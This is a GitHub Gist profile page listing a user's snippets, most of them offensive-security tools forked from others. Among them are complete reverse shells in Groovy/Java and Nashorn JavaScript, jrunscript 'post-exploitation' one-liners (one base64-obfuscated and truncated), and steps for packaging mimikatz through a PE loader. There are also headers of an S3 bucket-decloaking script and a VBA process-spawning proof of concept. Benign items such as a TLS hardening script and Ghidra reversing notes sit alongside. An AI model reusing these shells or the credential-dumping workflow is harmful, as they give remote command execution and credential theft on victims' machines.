Skip to content

Instantly share code, notes, and snippets.

View mosesrenegade's full-sized avatar

mosesrenegade mosesrenegade

86 followers · 4 following
View GitHub Profile
@mosesrenegade
mosesrenegade / Azure Rest.json
Last active February 10, 2021 11:16
{
"info": {
"_postman_id": "c0baae3a-0c9e-92f1-04fd-a27c315c5956",
"name": "Azure REST",
"schema": "https://schema.getpostman.com/json/collection/v2.0.0/collection.json"
},
"item": [
{
"name": "Get AAD Token",
"event": [
@mosesrenegade
mosesrenegade / bucket-disclose.sh
Created October 10, 2020 10:52 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@mosesrenegade
mosesrenegade / JVM_POST_EXPLOIT.md
Created August 14, 2020 00:58 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@mosesrenegade
mosesrenegade / revsh.groovy
Created August 14, 2020 00:57 — forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@mosesrenegade
mosesrenegade / revsh.js
Created August 14, 2020 00:57 — forked from frohoff/revsh.js
Nashorn Javascript Reverse Shell
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@mosesrenegade
mosesrenegade / Windows-TLS1.2-Only.ps1
Last active February 19, 2020 03:16
# Disable Multi-Protocol Unified Hello
New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server' -name Enabled -value 0 -PropertyType 'DWord' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force | Out-Null
New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Client' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Client' -name Enabled -value 0 -PropertyType 'DWord' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\P
@mosesrenegade
mosesrenegade / masscan_to_nmap.py
Created November 27, 2019 20:14 — forked from cynicXer/masscan_to_nmap.py
Parse a masscan output and run an nmap scan on it
#!/usr/bin/python
#
# import masscan output and run an nmap scan on the results
#
import sys
import argparse
from libnmap.parser import NmapParser, NmapParserException
from libnmap.process import NmapProcess
@mosesrenegade
mosesrenegade / PCMPBNMBAO_x86_poc.vba
Created November 4, 2019 12:19 — forked from xpn/PCMPBNMBAO_x86_poc.vba
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
@mosesrenegade
mosesrenegade / Steps.txt
Created October 19, 2019 19:51 — forked from med0x2e/Steps.txt
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.
4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.
6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"
@mosesrenegade
mosesrenegade / reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md
Created August 24, 2019 00:17 — forked from nstarke/01-reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md
Reversing Cisco IOS Raw Binary Firmware Images with Ghidra

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.

While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.

That makes importing this type of firmware file difficult, as Ghidra doesn't have any idea what type of ISA it needs to disassemble and decompile for.

The following are a few things I learned while trying to get the Cisco IOS image in a reversible state within Ghidra.

First I had to extract the image. The first 112 bytes of the firmware I received from the vendor are some sort of Cisco proprietary header that is not useful for our purpose. We need to extract the bzip2 archive that we are interested in. The easist way to do that is binwalk: